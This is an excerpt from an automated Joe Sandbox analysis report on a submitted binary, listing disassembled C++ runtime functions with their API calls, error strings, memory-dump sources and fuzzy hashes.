                                      • API ID: std::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                      • String ID: bad locale name
                                      • API String ID: 3988782225-1405518554
                                      • Opcode ID: b8cafadac2ffdd36b029deedd3c13e1a3dd5bae417dccca22e3e71fa26dcde20
                                      • Instruction ID: 0c7c6866800437b0467455e603fa26c81e962fc635ef7b43ee153539e071c76c
                                      • Opcode Fuzzy Hash: b8cafadac2ffdd36b029deedd3c13e1a3dd5bae417dccca22e3e71fa26dcde20
                                      • Instruction Fuzzy Hash: 23119E71904B54DFD320CF69C901B47BBE4EB19710F008A1EE899C3B81D7B5A508CB91
                                      APIs
                                      • SetLastError.KERNEL32(0000000D,?,00925A30,00000001,?,008B379A,00000000,?,008B2567,009DF6C0,008EED20,009DF6EC,?,008B379A,?,00000001), ref: 0092A73E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: ErrorLast
                                      • String ID: ios_base::failbit set
                                      • API String ID: 1452528299-3924258884
                                      • Opcode ID: 0e7d3ea292754df71f5e668b29315f5a9766df66b07b26ccc6ac13c4a3f2d812
                                      • Instruction ID: d4df58b27fba4451fe732f12447dacf1a42df8ce41ea5ea9e1d7b22aae8fdc36
                                      • Opcode Fuzzy Hash: 0e7d3ea292754df71f5e668b29315f5a9766df66b07b26ccc6ac13c4a3f2d812
                                      • Instruction Fuzzy Hash: E211E133618125AFCF125F65FC4496ABBBDFF08754F01803AF90586220DB709C50ABE2
                                      APIs
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 008E09EF
                                      Strings
                                      • OutputStringPointer, xrefs: 008E09A2
                                      • StringSink: OutputStringPointer not specified, xrefs: 008E09C6
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Exception@8Throw
                                      • String ID: OutputStringPointer$StringSink: OutputStringPointer not specified
                                      • API String ID: 2005118841-1331214609
                                      • Opcode ID: bce6f42d1f83e1243fa2af5643a5c51800c937feec1e623cf4d343b415e7853d
                                      • Instruction ID: 6dcda7ecb93791b8c44811f8125c070d934626139bf195e56b11db42b79b13d6
                                      • Opcode Fuzzy Hash: bce6f42d1f83e1243fa2af5643a5c51800c937feec1e623cf4d343b415e7853d
                                      • Instruction Fuzzy Hash: 70018F71945608EBDB00EF94CD42FDEB7BCEB49B14F10856AE811E3391DB75A9058B90
                                      APIs
                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0094F670
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0094F67E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                      • String ID: pContext
                                      • API String ID: 1687795959-2046700901
                                      • Opcode ID: c63467bbf285dafe4b88cc26728f84c112e5f15e2d33878f0daaf3b2a1fd0f57
                                      • Instruction ID: 8eaa7db6f10b5aba14c04b5f569ad6385399b62bf6083225a5247bd101d53acb
                                      • Opcode Fuzzy Hash: c63467bbf285dafe4b88cc26728f84c112e5f15e2d33878f0daaf3b2a1fd0f57
                                      • Instruction Fuzzy Hash: 34F0B435B00618AB8B04EBA9D899D5EB7AC9FC8B647414166E901E7351DB70ED018BD0
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: NameName::
                                      • String ID: {flat}
                                      • API String ID: 1333004437-2606204563
                                      • Opcode ID: bf5518999f737cf2203faf01a2802fcdd9f98b3d0e89ec868c6c4a651d7fc80f
                                      • Instruction ID: 5e205972ce80d1786ca2b6e69d5fd0f9601bdca3eb9913d6fce73cf2153fa5f6
                                      • Opcode Fuzzy Hash: bf5518999f737cf2203faf01a2802fcdd9f98b3d0e89ec868c6c4a651d7fc80f
                                      • Instruction Fuzzy Hash: CDF03071155308DFDB10DF59D495BAA3BD4DB81316F088445E94C0F292CB7598C0C790
                                      APIs
                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00952F68
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00952F76
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                      • String ID: pThreadProxy
                                      • API String ID: 1687795959-3651400591
                                      • Opcode ID: 8067c17a18c0c57ea0d1f2fc3011eb5116e8d046addf79f7b62ff62240a654f3
                                      • Instruction ID: 2668626d63b05d2517d45030ef6f95d177beab9d7cb5a2978c2717c3521da323
                                      • Opcode Fuzzy Hash: 8067c17a18c0c57ea0d1f2fc3011eb5116e8d046addf79f7b62ff62240a654f3
                                      • Instruction Fuzzy Hash: 3ED05E71D00208AACB00EBA9E84BF8E73AC9B40B48F1081786D11A604AEA70E508CBA0
                                      APIs
                                      • std::__non_rtti_object::__construct_from_string_literal.LIBVCRUNTIME ref: 009597C1
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 009597E8
                                        • Part of subcall function 00958621: RaiseException.KERNEL32(?,?,00925B8C,?,?,Dflt,?,?,?,?,?,00925B8C,?,009C9A70,?), ref: 00958681
                                      Strings
                                      • Access violation - no RTTI data!, xrefs: 009597B8
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: ExceptionException@8RaiseThrowstd::__non_rtti_object::__construct_from_string_literal
                                      • String ID: Access violation - no RTTI data!
                                      • API String ID: 2053020834-2158758863
                                      • Opcode ID: 77c40cacc15807934d1b27ea7840e811ec689a4db7c47f2a0e4acd7d7893cd71
                                      • Instruction ID: 1d3395ee9ef0c012a353e913b6fd3990c9802c2319b127fe61edeccff82f53d3
                                      • Opcode Fuzzy Hash: 77c40cacc15807934d1b27ea7840e811ec689a4db7c47f2a0e4acd7d7893cd71
                                      • Instruction Fuzzy Hash: 5DD0C962C0820C9A9F18EAE18807DDE77A8DA48701F200847FA20A7441AA66FA1C4762
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,7622DF60), ref: 0094032F
                                      • HeapFree.KERNEL32(00000000), ref: 0094033C
                                      • GetProcessHeap.KERNEL32(00000000,762330E0,?,762330E0,00000000,00990CB8,000000FF), ref: 00940372
                                      • HeapFree.KERNEL32(00000000,?,762330E0,00000000,00990CB8,000000FF), ref: 00940379
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Heap$FreeProcess
                                      • String ID:
                                      • API String ID: 3859560861-0
                                      • Opcode ID: e52a27f7362260e5cbbf22036f81b8750162b2c914fa8bab108de637ce6dad93
                                      • Instruction ID: 5f59675a8b20581904f00f8bd33cc70bea21acc9fdb51b39a30a02d289f1e617
                                      • Opcode Fuzzy Hash: e52a27f7362260e5cbbf22036f81b8750162b2c914fa8bab108de637ce6dad93
                                      • Instruction Fuzzy Hash: B531B47190A614AFDB21CF68C948B5AFBB8EF85720F24435AEA38973D0D7745901CB90